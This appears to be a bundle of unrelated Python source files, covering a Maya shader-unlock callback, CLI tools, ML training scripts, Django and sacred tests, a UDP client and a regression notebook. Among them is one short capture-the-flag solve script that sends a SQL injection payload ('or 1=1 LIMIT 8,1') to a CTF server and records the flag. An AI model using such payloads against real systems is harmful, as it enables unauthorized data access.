#!/usr/bin/env python
# -*- coding: utf-8 -*-
import maya.cmds as cmds
import maya.OpenMaya as om
import locale
_LOCALE, _ = locale.getdefaultlocale()
if _LOCALE == 'ko_KR':
_UNLOCK_MSG = u" lambert1 이 lock 되어있는 문제를 수정하였습니다.\n 수정한 scene 을 저장하십시오."
else:
    _UNLOCK_MSG = u' The lambert1 lock issue has been resolved.\n Please save the scene file.'
_INITIAL_SHADERS = ['initialShadingGroup', 'initialParticleSE', 'lambert1']
def iterLockedInitialShaders():
nodes = cmds.ls(_INITIAL_SHADERS, r=True)
if nodes:
for node in nodes:
locked = cmds.lockNode(node, q=True, lu=True)
if locked[0]:
yield node
def unLockInitialShaders(*args):
lockShaders = list(iterLockedInitialShaders())
if lockShaders:
for node in lockShaders:
print('unlock node -> "{}"'.format(node))
cmds.lockNode(node, l=False, lu=False)
cmds.inViewMessage(bkc=0x09e2e2e, msg=_UNLOCK_MSG, fst=3200, fade=6, fts=14, font='Arial', pos='midCenterTop')
def beforeSaveCallback():
    # Register a callback that unlocks lambert1 before the scene is saved
om.MSceneMessage.addCallback(om.MSceneMessage.kBeforeSave, unLockInitialShaders)
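# A minimal usage sketch (assumptions: this module is saved as `unlock_lambert1.py`
# on Maya's script path and imported once, e.g. from userSetup.py):
#
#   import unlock_lambert1
#   unlock_lambert1.beforeSaveCallback()  # initial shaders are unlocked before every save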
|
import pytest
def test_test():
pass
|
from rx import Observer
class MovieObserver(Observer):
"""Listen and receive movies from an Observable object."""
def on_next(self, value):
print("Received: {}".format(value))
def on_error(self, error):
print("Error: {}".format(error))
def on_completed(self):
print("All movies done!")
|
from typing import List

from pacco.cli.commands.utils.command_abstract import CommandAbstract
from pacco.manager.abstracts.remote import RemoteAbstract
class Remote(CommandAbstract):
def list(self, *args):
"""
List existing remotes.
"""
parser = self.init_parser('list')
parser.parse_args(args)
remotes: List[RemoteAbstract] = self.rm.list_remote()
self.out.writeln(remotes)
def add(self, *args):
"""
Add a remote.
"""
parser = self.init_parser('add')
parser.add_argument("name", help="remote name")
parser.add_argument("type", help="remote type, choices: 'local', 'nexus_site', 'webdav', 'nexus3'")
parser.add_argument("args", help="remote args, a comma separated value(s) (with no space) depending on the "
"remote type. "
"(1) For local, it's the path (can be empty). "
"(2) For nexus_site, it's the url, username, and password. "
"(3) For webdav, it's the host url, directory path, username, and password "
"(4) For nexus3, it's the host url, repository name, username and password")
parsed_args = parser.parse_args(args)
if parsed_args.type == "local":
path = parsed_args.args
if path == 'default':
path = ''
self.rm.add_remote(parsed_args.name, {
"remote_type": "local",
"path": path
})
elif parsed_args.type == "nexus_site":
nexus_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "nexus_site",
"url": nexus_args[0],
"username": nexus_args[1],
"password": nexus_args[2]
})
elif parsed_args.type == "webdav":
webdav_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "webdav",
"host_path": (webdav_args[0], webdav_args[1]),
"credential": (webdav_args[2], webdav_args[3]),
})
elif parsed_args.type == 'nexus3':
nexus3_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "nexus3",
"host_path": (nexus3_args[0], '/'),
"repository_name": nexus3_args[1],
"credential": (nexus3_args[2], nexus3_args[3]),
})
else:
raise NameError("The remote type you provided is not valid.")
def remove(self, *args):
"""
Remove a remote.
"""
parser = self.init_parser('remove')
parser.add_argument("name", help="remote name")
parsed_args = parser.parse_args(args)
self.rm.remove_remote(parsed_args.name)
def set_default(self, *args):
"""
Set default remote(s).
"""
parser = self.init_parser('set_default')
parser.add_argument("name", nargs="*", help="remote name")
parsed_args = parser.parse_args(args)
self.rm.set_default(parsed_args.name)
def list_default(self, *args):
"""
List default remote(s).
"""
parser = self.init_parser('list_default')
parser.parse_args(args)
default_remotes = self.rm.get_default()
self.out.writeln(default_remotes)
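# Example invocations (an assumption: the commands are exposed as `pacco remote ...`;
# the argument layout follows the parsers defined above):
#
#   pacco remote add my_local local default
#   pacco remote add my_nexus nexus_site https://nexus.example.com,user,pass
#   pacco remote set_default my_local
#   pacco remote list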
|
from typing import Any, Callable, Iterator, List, Mapping, Optional
import numpy as np
import sacrebleu
from tqdm import tqdm
from datalabs.operations.aggregate.aggregating import Aggregating, aggregating
from datalabs.operations.featurize import get_gender_bias
from datalabs.operations.operation import dataset_operation, DatasetOperation
class TextMatchingAggregating(Aggregating, DatasetOperation):
def __init__(
self,
name: str = None,
func: Callable[..., Any] = None,
resources: Optional[Mapping[str, Any]] = None,
contributor: str = None,
processed_fields: List = ["text1", "text2"],
generated_field: str = None,
task="text-matching",
description=None,
):
super().__init__(
name=name,
func=func,
resources=resources,
contributor=contributor,
task=task,
description=description,
)
self._type = "TextMatchingAggregating"
self.processed_fields = ["text1", "text2"]
if isinstance(processed_fields, str):
self.processed_fields[0] = processed_fields
else:
self.processed_fields = processed_fields
self.generated_field = generated_field
self._data_type = "Dataset"
class text_matching_aggregating(aggregating, dataset_operation):
def __init__(
self,
name: Optional[str] = None,
resources: Optional[Mapping[str, Any]] = None,
contributor: str = None,
processed_fields: List = ["text1", "text2"],
generated_field: str = None,
task="text-matching",
description=None,
):
super().__init__(
name=name,
resources=resources,
contributor=contributor,
description=description,
)
self.processed_fields = processed_fields
self.generated_field = generated_field
self.task = task
def __call__(self, *param_arg):
if callable(self.name):
tf_class = TextMatchingAggregating(name=self.name.__name__, func=self.name)
return tf_class(*param_arg)
else:
f = param_arg[0]
name = self.name or f.__name__
tf_cls = TextMatchingAggregating(
name=name,
func=f,
resources=self.resources,
contributor=self.contributor,
processed_fields=self.processed_fields,
generated_field=self.generated_field,
task=self.task,
description=self.description,
)
return tf_cls
def get_similarity_by_sacrebleu(text1, text2):
# pip install sacrebleu
references = [text1]
hypothesis = text2
score = sacrebleu.sentence_bleu(hypothesis, references).score
return score
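# Quick sanity check for the helper above (assumes sacrebleu is installed);
# an identical sentence pair scores the maximum of 100.0:
#
#   >>> get_similarity_by_sacrebleu("a small test sentence", "a small test sentence")
#   100.0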
@text_matching_aggregating(
name="get_statistics",
contributor="datalab",
task="text-matching, natural-language-inference",
    description="Calculate the overall statistics (e.g., average length) of a given "
    "text pair classification dataset, e.g. natural language inference",
)
def get_statistics(samples: Iterator):
"""
Input:
samples: [{
"text1":
"text2":
}]
Output:
dict:
usage:
    you can test it with the following code:
from datalabs import load_dataset
from aggregate.text_matching import *
dataset = load_dataset('sick')
res = dataset['test'].apply(get_statistics)
print(next(res))
"""
# for hate speech
# from hatesonar import Sonar
# sonar = Sonar()
sample_infos = []
text1_lengths = []
text2_lengths = []
labels_to_number = {}
vocab = {}
number_of_tokens = 0
gender_results = []
# hatespeech = {
# "hate_speech":{"ratio":0,"texts":[]},
# "offensive_language":{"ratio":0,"texts":[]},
# "neither":{"ratio":0,"texts":[]}}
text1_divided_text2 = []
similarities = []
for sample in tqdm(samples):
text1, text2, label = sample["text1"], sample["text2"], sample["label"]
similarity_of_text_pair = get_similarity_by_sacrebleu(text1, text2)
similarities.append(similarity_of_text_pair)
# average length of text1
text1_length = len(text1.split(" "))
text1_lengths.append(text1_length)
# average length of text2
text2_length = len(text2.split(" "))
text2_lengths.append(text2_length)
# text1/text2
text1_divided_text2.append(len(text1.split(" ")) / len(text2.split(" ")))
# label info
if label in labels_to_number.keys():
labels_to_number[label] += 1
else:
labels_to_number[label] = 1
# update the number of tokens
number_of_tokens += len(text1.split())
number_of_tokens += len(text2.split())
# Vocabulary info
for w in (text1 + text2).split(" "):
if w in vocab.keys():
vocab[w] += 1
else:
vocab[w] = 1
# Gender info
gender_result1 = get_gender_bias.func(text1)
gender_result2 = get_gender_bias.func(text2)
gender_results.append(gender_result1["gender_bias_info"])
gender_results.append(gender_result2["gender_bias_info"])
        # hatespeech
# results = sonar.ping(text=text1)
# class_1 = results['top_class']
# confidence = 0
# for value in results['classes']:
# if value['class_name'] == class_1:
# confidence = value['confidence']
# break
#
# hatespeech[class_1]["ratio"] += 1
# if class_1 != "neither":
# hatespeech[class_1]["texts"].append(text1)
# results = sonar.ping(text=text2)
# class_2 = results['top_class']
# confidence = 0
# for value in results['classes']:
# if value['class_name'] == class_2:
# confidence = value['confidence']
# break
#
# hatespeech[class_2]["ratio"] += 1
# if class_2 != "neither":
# hatespeech[class_2]["texts"].append(text2)
sample_info = {
"text1": text1,
"text2": text2,
"label": label,
"text1_length": text1_length,
"text2_length": text2_length,
"text1_gender": gender_result1,
"text2_gender": gender_result2,
# "text1_hate_speech_class":class_1,
# "text2_hate_speech_class":class_2,
"text1_divided_text2": len(text1.split(" ")) / len(text2.split(" ")),
"similarity_of_text_pair": similarity_of_text_pair,
}
if len(sample_infos) < 10000:
sample_infos.append(sample_info)
# ------------------ Dataset-level ----------------
# get vocabulary
vocab_sorted = dict(sorted(vocab.items(), key=lambda item: item[1], reverse=True))
# compute dataset-level gender_ratio
gender_ratio = {
"word": {"male": 0, "female": 0},
"single_name": {"male": 0, "female": 0},
}
for result in gender_results:
res_word = result["word"] # noqa
gender_ratio["word"]["male"] += result["word"]["male"]
gender_ratio["word"]["female"] += result["word"]["female"]
gender_ratio["single_name"]["male"] += result["single_name"]["male"]
gender_ratio["single_name"]["female"] += result["single_name"]["female"]
n_gender = gender_ratio["word"]["male"] + gender_ratio["word"]["female"]
if n_gender != 0:
gender_ratio["word"]["male"] /= n_gender
gender_ratio["word"]["female"] /= n_gender
else:
gender_ratio["word"]["male"] = 0
gender_ratio["word"]["female"] = 0
n_gender = (
gender_ratio["single_name"]["male"] + gender_ratio["single_name"]["female"]
)
if n_gender != 0:
gender_ratio["single_name"]["male"] /= n_gender
gender_ratio["single_name"]["female"] /= n_gender
else:
gender_ratio["single_name"]["male"] = 0
gender_ratio["single_name"]["female"] = 0
# get ratio of hate_speech:offensive_language:neither
# for k,v in hatespeech.items():
# hatespeech[k]["ratio"] /= 2* len(samples)
res = {
"dataset-level": {
"length_info": {
"max_text1_length": np.max(text1_lengths),
"min_text1_length": np.min(text1_lengths),
"average_text1_length": np.average(text1_lengths),
"max_text2_length": np.max(text2_lengths),
"min_text2_length": np.min(text2_lengths),
"average_text2_length": np.average(text2_lengths),
"text1_divided_text2": np.average(text1_divided_text2),
},
"label_info": {
"ratio": min(labels_to_number.values())
* 1.0
/ max(labels_to_number.values()),
"distribution": labels_to_number,
},
"vocabulary_info": vocab_sorted,
"number_of_samples": len(samples),
"number_of_tokens": number_of_tokens,
"gender_info": gender_ratio,
"average_similarity": np.average(similarities),
# "hatespeech_info": hatespeech,
},
"sample-level": sample_infos,
}
return res
|
#!/usr/bin/env python
"""
Define command line entry for tool `pbsvp`, including
pbsvp polish
pbsvp collect
Define `pbsvputil`, utils for `pbsvp`, including
pbsvputil trim-lq
pbsvputil transform-coordinate
pbsvputil svdagcon
"""
import sys
import logging
from .__init__ import (get_version, POLISH_ENTRY, COLLECT_ENTRY, TRIM_ENTRY,
SVDAGCON_ENTRY, TRANSFORM_ENTRY, EXTRACTSR_ENTRY)
from pbsv.__utils import (get_default_argparser, setup_log, main_runner,
compose, subparser_builder, validate_file, args_executer)
from .argsutil import (add_polish_parser_options, add_collect_parser_options,
add_trim_parser_options, add_transform_parser_options,
add_svdagcon_parser_options, add_extractsr_parser_options)
from .utils import make_subreads_bam_of_zmws2
from .polish import polish_desc, run_polish
from .collect import collect_desc, run_collect
from .trim_lq import trim_desc, run_trim
from .transform_coordinates import transform_desc, run_transform
from .svdagcon import svdagcon_desc, run_svdagcon
log = logging.getLogger()
slog = logging.getLogger('status.' + __file__)
def _args_run_polish(args):
"""Run `pbsvp polish`"""
log.info("Running `{}`".format(POLISH_ENTRY))
log.debug('Locals={}'.format(locals()))
run_polish(genome_fa=args.genome_fa, subreads_xml_fn=args.subreads_bam, aln_fn=args.alignments_bam,
in_bed_fn=args.in_rich_bed, out_dir=args.out_dir,
min_coverage=args.min_coverage, min_qv=args.min_qv,
ref_ext_len=args.ref_ext_len, use_sge=args.use_sge)
return 0
def _args_run_collect(args):
"""Run `pbsvp collect`"""
log.info("Running `{}`".format(COLLECT_ENTRY))
log.debug('Locals={}'.format(locals()))
run_collect(work_dir=args.work_dir, collected_bed_fn=args.out_bed_or_vcf_fn,
min_qv=args.min_qv, ref_ext_len=args.ref_ext_len)
return 0
def _args_run_trim(args):
log.info("Running `{}`".format(TRIM_ENTRY))
log.debug('Locals={}'.format(locals()))
run_trim(i_fn=args.in_fa_or_fq_fn, o_fn=args.out_fa_or_fq_fn,
min_qv=args.min_qv, windowsize=args.qv_windowsize)
return 0
def _args_run_svdagcon(args):
log.info("Running `{}`".format(SVDAGCON_ENTRY))
log.debug('Locals={}'.format(locals()))
run_svdagcon(input_subreads_bam=args.subreads_bam, ref_fa=args.ref_fa,
output_prefix=args.output_prefix, consensus_id=args.consensus_id,
nproc=args.nproc, max_score=args.max_score,
use_first_seq_if_fail=args.use_first_seq_if_fail)
return 0
def _args_run_transform(args):
log.info('Running `{}`'.format(TRANSFORM_ENTRY))
log.debug('Locals={}'.format(locals()))
run_transform(i_fn=args.in_bed_or_vcf_fn, o_fn=args.out_bed_or_vcf_fn)
return 0
def _args_run_extract_subreads(args):
log.info('Running `{}`'.format(EXTRACTSR_ENTRY))
log.debug('Locals={}'.format(locals()))
make_subreads_bam_of_zmws2(in_subreads_fn_or_obj=args.in_bam_or_xml,
zmws=args.zmws, out_bam_fn=args.out_bam_or_xml,
out_fa_fn=args.out_bam[0:args.out_bam.rfind('.')]+'.fasta')
return 0
def pbsvp_get_parser():
"""Get parser for pbsvp subcommands"""
desc = "PacBio Structural Variants Polish Tool Suite"
p = get_default_argparser(version=get_version(), description=desc)
sp = p.add_subparsers(help='commands')
def builder(subparser_id, description, options_func, exe_func, epilog=None):
"""subparser builder"""
subparser_builder(sp, subparser_id, description, options_func, exe_func, epilog)
# `pbsvp polish`, polish structural variants
polish_desc = "Polish structural variants"
builder('polish', polish_desc, add_polish_parser_options, _args_run_polish)
# `pbsvp collect`, collect polished structural variants
collect_desc = "Collect polished structural variants"
builder('collect', collect_desc, add_collect_parser_options, _args_run_collect)
return p
def pbsvputil_get_parser():
"""Get parser for pbsvputil subcommands"""
desc = "PacBio Structural Variants Polish Utils"
p = get_default_argparser(version=get_version(), description=desc)
sp = p.add_subparsers(help='commands')
def builder(subparser_id, description, options_func, exe_func, epilog=None):
"""subparser builder"""
subparser_builder(sp, subparser_id, description, options_func, exe_func, epilog)
# `pbsvputil trim-lq`
builder('trim-lq', trim_desc, add_trim_parser_options, _args_run_trim)
# `pbspvutil svdagcon`
builder('svdagcon', svdagcon_desc, add_svdagcon_parser_options, _args_run_svdagcon)
# `pbsvputil transform-coordinate`
builder('transform-coordinate', transform_desc, add_transform_parser_options, _args_run_transform)
# `pbsvputil extract-subreads`
extractsr_desc = """Extract subreads bam of zmws ('movie/zmw') from input subreads bam or xml."""
builder('extract-subreads', extractsr_desc, add_extractsr_parser_options, _args_run_extract_subreads)
return p
def pbsvp_main(argv=None):
"""pbsvp Main function, entry for command line tool `pbsvp`"""
argv_ = sys.argv if argv is None else argv
parser = pbsvp_get_parser()
return main_runner(argv_[1:], parser, args_executer, setup_log, log)
def pbsvputil_main(argv=None):
"""pbsvputil main function, entry for command line tool `pbsvputil`"""
argv_ = sys.argv if argv is None else argv
parser = pbsvputil_get_parser()
return main_runner(argv_[1:], parser, args_executer, setup_log, log)
|
from gradnet import Input, Model
from gradnet.layers import Dense, Conv2D, Pool, Flatten
from gradnet.activations import get_activation
from gradnet.optimizers import get_optimizer
from gradnet.losses import get_loss
from gradnet.metrics import get_metric
import numpy as np
from tensorflow.keras.datasets import mnist
accuracy = get_metric("accuracy")
def create_model():
relu = get_activation("relu")
cce = get_loss("cce")
mse = get_loss("mse")
inp = Input((28,28,1))
conv1 = Conv2D(3,3,32, activation="relu")(inp)
pool1 = Pool(2,2, "max")(conv1)
conv2 = Conv2D(3,3,64, activation="relu")(pool1)
pool2 = Pool(2,2, "max")(conv2)
flat = Flatten()(pool2)
top = Dense(10, name="top")(flat)
probs = get_activation("softmax", name="softmax")(top)
model = Model([inp], [probs])
model.add_loss(cce(probs))
sgd = get_optimizer("SGD", learning_rate=0.01, momentum=0.5)
model.compile(optimizer=sgd)
return model
(x_train, y_train), (x_test, y_test) = mnist.load_data()
def one_hot(labels, n):
out = np.zeros((len(labels), n))
for i in range(n):
out[labels==i, i] = 1.0
return out
x_train = (x_train/256.0).reshape((-1,28,28,1))
x_test = (x_test/256.0).reshape((-1,28,28,1))
n_train = len(x_train)
y_train = one_hot(y_train, 10)
y_test = one_hot(y_test, 10)
np.set_printoptions(precision=4, suppress=True)
model = create_model()
mbsize = 100
class Callback(object):
def __init__(self):
self.NextPrint = self.PrintEvery = 100
def train_batch_end(self, samples, loss_values, mvalues):
if samples >= self.NextPrint:
print(f"Samples: {samples}, losses:{loss_values}, metrics:{mvalues}")
self.NextPrint += self.PrintEvery
for epoch in range(10):
losses, metrics = model.fit(x_train, y_train, batch_size=30, metrics=[accuracy], callbacks=[Callback()])
y = model.compute(x_test)
y_ = y_test
acc = accuracy(y_test, y[0])
print("test accuracy:", acc)
|
from django.contrib.admin import AdminSite
from django.test import TestCase
from django.utils.translation import ugettext_lazy as _
from tests.example.admin import DetailInInlineExampleModelAdminInline
from tests.example.factories import DetailInInlineExampleModelFactory
from tests.example.models import DetailInInlineExampleModel
class MockRequest:
pass
class DetailInInlineAdminMixinUnitTest(TestCase):
def setUp(self) -> None:
self.site = AdminSite()
self.request = MockRequest()
def test_get_fields(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
self.assertEqual(
sorted(admin.get_fields(self.request)),
sorted(("display_inline_obj", "test_text"))
)
def test_get_readonly_fields(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
self.assertEqual(
sorted(admin.get_readonly_fields(self.request)),
sorted(("display_inline_obj",))
)
def test_display_inline_obj(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
obj = DetailInInlineExampleModelFactory()
self.assertEqual(
admin.display_inline_obj(obj),
'<a href="{0}" target="_blank" class="admin-button admin-button-success">{1}</a>'.format(
obj.admin_change_url, _("Detail")
)
)
|
import requests
url = lambda payload: 'http://sosimple.darkarmy.xyz/?id=' + payload
r = requests.post(url("' or 1=1 LIMIT 8,1 -- "))
print(r.text)
# darkCTF{uniqu3_ide4_t0_find_fl4g}
|
import matplotlib.pyplot as plt
from grid_search import GridSearch
from sklearn import datasets
from linear_regression import LassoRegression, RidgeRegression
X, y = datasets.load_boston(return_X_y=True)
models = [LassoRegression, RidgeRegression]
regularization_factors = [{'rf': rf/10} for rf in range(11)]
grid_search = GridSearch()
grid_search(models, regularization_factors, X, y)
plt.savefig(fname="lasso_ridge_rfs.jpg")
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
import pytest
import sacred.optional as opt
from sacred.config import ConfigDict
from sacred.config.custom_containers import DogmaticDict, DogmaticList
@pytest.fixture
def conf_dict():
cfg = ConfigDict({
"a": 1,
"b": 2.0,
"c": True,
"d": 'string',
"e": [1, 2, 3],
"f": {'a': 'b', 'c': 'd'},
})
return cfg
def test_config_dict_returns_dict(conf_dict):
assert isinstance(conf_dict(), dict)
def test_config_dict_result_contains_keys(conf_dict):
cfg = conf_dict()
assert set(cfg.keys()) == {'a', 'b', 'c', 'd', 'e', 'f'}
assert cfg['a'] == 1
assert cfg['b'] == 2.0
assert cfg['c']
assert cfg['d'] == 'string'
assert cfg['e'] == [1, 2, 3]
assert cfg['f'] == {'a': 'b', 'c': 'd'}
def test_fixing_values(conf_dict):
assert conf_dict({'a': 100})['a'] == 100
@pytest.mark.parametrize("key", ["_underscore", "white space", 12, "12", "$f"])
def test_config_dict_raises_on_invalid_keys(key):
with pytest.raises(KeyError):
ConfigDict({key: True})
@pytest.mark.parametrize("value", [lambda x:x, pytest, test_fixing_values])
def test_config_dict_raises_on_invalid_values(value):
with pytest.raises(ValueError):
ConfigDict({"invalid": value})
def test_fixing_nested_dicts(conf_dict):
cfg = conf_dict({'f': {'c': 't'}})
assert cfg['f']['a'] == 'b'
assert cfg['f']['c'] == 't'
def test_adding_values(conf_dict):
cfg = conf_dict({'g': 23, 'h': {'i': 10}})
assert cfg['g'] == 23
assert cfg['h'] == {'i': 10}
assert cfg.added == {'g', 'h', 'h.i'}
def test_typechange(conf_dict):
cfg = conf_dict({'a': 'bar', 'b': 'foo', 'c': 1})
assert cfg.typechanged == {'a': (int, type('bar')),
'b': (float, type('foo')),
'c': (bool, int)}
def test_nested_typechange(conf_dict):
cfg = conf_dict({'f': {'a': 10}})
assert cfg.typechanged == {'f.a': (type('a'), int)}
def is_dogmatic(a):
if isinstance(a, (DogmaticDict, DogmaticList)):
return True
elif isinstance(a, dict):
return any(is_dogmatic(v) for v in a.values())
elif isinstance(a, (list, tuple)):
return any(is_dogmatic(v) for v in a)
def test_result_of_conf_dict_is_not_dogmatic(conf_dict):
cfg = conf_dict({'e': [1, 1, 1]})
assert not is_dogmatic(cfg)
@pytest.mark.skipif(not opt.has_numpy, reason="requires numpy")
def test_conf_scope_handles_numpy_bools():
cfg = ConfigDict({
"a": opt.np.bool_(1)
})
assert 'a' in cfg()
assert cfg()['a']
def test_conf_scope_contains_presets():
conf_dict = ConfigDict({
"answer": 42
})
cfg = conf_dict(preset={'a': 21, 'unrelated': True})
assert set(cfg.keys()) == {'a', 'answer', 'unrelated'}
assert cfg['a'] == 21
assert cfg['answer'] == 42
assert cfg['unrelated'] is True
def test_conf_scope_does_not_contain_fallback():
config_dict = ConfigDict({
"answer": 42
})
cfg = config_dict(fallback={'a': 21, 'b': 10})
assert set(cfg.keys()) == {'answer'}
def test_fixed_subentry_of_preset():
config_dict = ConfigDict({})
cfg = config_dict(preset={'d': {'a': 1, 'b': 2}}, fixed={'d': {'a': 10}})
assert set(cfg.keys()) == {'d'}
assert set(cfg['d'].keys()) == {'a', 'b'}
assert cfg['d']['a'] == 10
assert cfg['d']['b'] == 2
|
import socket
target_ip="127.0.0.1"
target_port=8888
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
while True:
data=input("Enter your message --->>> ")
msg=data.encode('ascii')
s.sendto(msg,(target_ip,target_port))
print(s.recvfrom(100))
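# A minimal echo server for testing the client above (an assumption: the real
# server is not part of this file). Run it in a separate terminal first:
#
#   import socket
#   srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   srv.bind(("127.0.0.1", 8888))
#   while True:
#       data, addr = srv.recvfrom(100)
#       srv.sendto(data, addr)  # echo the message back to the client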
|
import numpy as np
from .core import Nominable
from .params import Parameters, Scale, Precision
from csb.core import validatedproperty
class Probability(Nominable):
"""Probability
Generic class that will be subclassed by all probabilistic models.
"""
def log_prob(self):
raise NotImplementedError
def sample(self):
raise NotImplementedError
def __init__(self, name, params=None):
self.name = name
self.params = params or Parameters()
class Likelihood(Probability):
@validatedproperty
def data(values):
"""
Observed data stored in a single vector.
"""
return np.ascontiguousarray(values)
@validatedproperty
def grad(values):
"""
Array for storing derivatives of likelihood with respect to mock data.
"""
return np.ascontiguousarray(values)
@property
def beta(self):
"""
Inverse temperature.
"""
return self._beta.get()
@beta.setter
def beta(self, value):
self._beta.set(value)
def __init__(self, name, data, mock, beta=1.0, params=None):
"""Likelihood
Initialize likelihood by providing a name, the raw data
        and a theory for calculating idealized observations.
Parameters
----------
name : string
name of the likelihood function
data : iterable
list of raw data points
mock : instance of Parameters
theory for calculating idealized data (needs to implement
update_forces)
beta : non-negative float
inverse temperature used in tempering and annealing
"""
super(Likelihood, self).__init__(name, params)
self.data = data
self.mock = mock
self.grad = np.zeros(data.shape)
self._beta = Scale(self.name + '.beta')
self.params.add(self._beta)
self.beta = beta
def update(self):
self.mock.update(self.params)
def update_derivatives(self):
"""
Calculate derivative of log likelihood with respect to mock
data.
"""
raise NotImplementedError
def update_forces(self):
"""
Update Cartesian forces by applying the chain rule.
"""
self.update_derivatives()
self.mock.update_forces(self.grad, self.params)
class Normal(Likelihood):
"""Normal
Likelihood implementing a Normal distribution. It has a single
nuisance parameter: the precision, i.e. inverse variance
"""
@property
def precision(self):
"""
Inverse variance
"""
return self._precision
@property
def tau(self):
return self._precision.get()
@tau.setter
def tau(self, value):
self._precision.set(value)
@property
def sigma(self):
"""
Standard deviation
"""
return 1 / self.tau**0.5
def __init__(self, name, data, mock, precision=1.0, params=None):
super(Normal, self).__init__(name, data, mock, params=params)
self._precision = Precision(self.name + '.precision')
self.tau = precision
@property
def logZ(self):
"""
Normalization constant of the Normal distribution
"""
return - 0.5 * len(self.data) * np.log(0.5 * self.tau / np.pi)
def log_prob(self):
diff = self.mock.get() - self.data
log_prob = - 0.5 * self.tau * np.dot(diff,diff) - self.logZ
return self.beta * log_prob
def update_derivatives(self):
self.grad[...] = self.beta * self.tau * (self.data - self.mock.get())
def __str__(self):
s = super(Normal, self).__str__()
return s.replace(')', ', precision={0:0.3f})'.format(self.tau))
class LowerUpper(Normal):
"""LowerUpper
Error model implementing a Normal distribution with a flat plateau. The
start and end of the plateau are marked by lower bounds (stored in 'lower')
and upper bounds (stored in 'upper')
"""
@validatedproperty
def lower(values):
return np.ascontiguousarray(values)
@validatedproperty
def upper(values):
return np.ascontiguousarray(values)
@property
def logZ(self):
"""
Normalization constant
"""
from .lowerupper import logZ
return logZ(self.lower, self.upper, self.tau)
def __init__(self, name, data, mock, lower, upper, precision=1.0, params=None):
super(LowerUpper, self).__init__(name, data, mock, precision, params=params)
self.lower = lower
self.upper = upper
self.validate()
def log_prob(self):
from .lowerupper import log_prob
lgp = log_prob(self.data, self.mock.get(), self.lower, self.upper)
return 0.5 * self.beta * self.tau * lgp - self.beta * self.logZ
def update_derivatives(self):
from .lowerupper import update_derivatives
update_derivatives(self.mock.get(), self.grad, self.lower,
self.upper, self.beta * self.tau)
def validate(self):
if np.any(self.lower > self.upper):
msg = 'Lower bounds must be smaller than upper bounds'
raise ValueError(msg)
class Logistic(Likelihood):
"""Logistic
Logistic likelihood for binary observations.
"""
@property
def steepness(self):
"""
Steepness of logistic function.
"""
return self._steepness
@property
def alpha(self):
"""
Returns the current value of the steepness parameter.
"""
return self._steepness.get()
@alpha.setter
def alpha(self, value):
self._steepness.set(value)
def __init__(self, name, data, mock, steepness=1.0, params=None):
super(Logistic, self).__init__(name, data, mock, params=params)
self._steepness = Scale(self.name + '.steepness')
self.alpha = steepness
def log_prob(self):
from .logistic import log_prob
return self.beta * log_prob(self.data, self.mock.get(), self.alpha)
def update_derivatives(self):
from .logistic import update_derivatives
update_derivatives(self.data, self.mock.get(), self.grad, self.alpha)
self.grad *= self.beta
def __str__(self):
s = super(Logistic, self).__str__()
s = s.replace(')', ', steepness={0:0.3f})'.format(self.alpha))
return s
class Relu(Logistic):
"""Relu
Relu likelihood for binary observations.
"""
def log_prob(self):
from .relu import log_prob
return self.beta * log_prob(self.data, self.mock.get(), self.alpha)
def update_derivatives(self):
from .relu import update_derivatives
## self.grad[...] = 0.
update_derivatives(self.data, self.mock.get(), self.grad, self.alpha)
self.grad *= self.beta
|
# %%
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as pl
from sklearn.metrics import r2_score, mean_squared_error
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels
import statsmodels.api as sm
from IPython.display import display
# %% [markdown]
'''
<h3>Constants</h3>
'''
# %%
TV = 'TV'
Radio = "Radio"
Newspaper = 'Newspaper'
Sales = 'Sales'
# %%
advertising = pd.read_csv("advertising.csv")
advertising.head()
# %%
advertising.shape
# %%
advertising.info()
# %%
advertising.describe()
# %%
advertising.isnull().any()
# %%
# visualize data
sns.regplot(x=TV, y=Sales, data=advertising)
# %%
sns.regplot(x=Radio, y=Sales, data=advertising)
# %%
sns.regplot(x=Newspaper, y=Sales, data=advertising)
# %%
sns.pairplot(advertising, x_vars=[
TV, Newspaper, Radio], y_vars=Sales, size=4, aspect=1, kind='scatter')
plt.show()
# %%
advertising.corr()
# %%
sns.heatmap(advertising.corr(), cmap="YlGnBu", annot=True)
# %%
# create X and y
X = advertising[TV]
y = advertising[Sales]
# %%
# train_test_split
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=0.7, random_state=100)
X_train
# %%
# training the model
X_train_sm = sm.add_constant(X_train)
X_train_sm.head()
# %%
lr = sm.OLS(y_train, X_train_sm)
lr_model = lr.fit()
# %%
lr_model.params
# %%
lr_model.summary()
# %%
y_train_pred = lr_model.predict(X_train_sm)
y_train_pred
# %%
plt.scatter(X_train, y_train)
plt.plot(X_train, y_train_pred, 'r')
plt.show()
# %% [markdown]
'''
<h2>Residual Analysis</h2>
'''
# %%
# y_train, y_train_pred
res = y_train - y_train_pred
plt.figure()
sns.distplot(res)
plt.title("Residual Plot")
plt.show()
# %%
# look for patterns in Residual
plt.scatter(X_train, res)
plt.show()
# %% [markdown]
'''
<h2>Step 4: Predictions and evaluation on the test set</h2>
'''
# %%
# make test data
X_test_sm = sm.add_constant(X_test)
# predict on test data and eval data on r-squared and others
y_test_pred = lr_model.predict(X_test_sm)
# %%
y_test_pred.head()
# %%
r2_test = r2_score(y_test, y_test_pred)
r2_test
# %%
mean_squared_error(y_test, y_test_pred)
# %%
plt.scatter(X_test, y_test)
plt.plot(X_test, y_test_pred, 'r')
plt.show()
# %%
# Reshape to 140,1
X_train_lm = X_train.values.reshape(-1, 1)
X_test_lm = X_test.values.reshape(-1, 1)
X_test_lm.shape
# %%
lm = LinearRegression()
lm.fit(X_train_lm, y_train)
# %%
display(lm.coef_, lm.intercept_)
# %%
# make Predictions
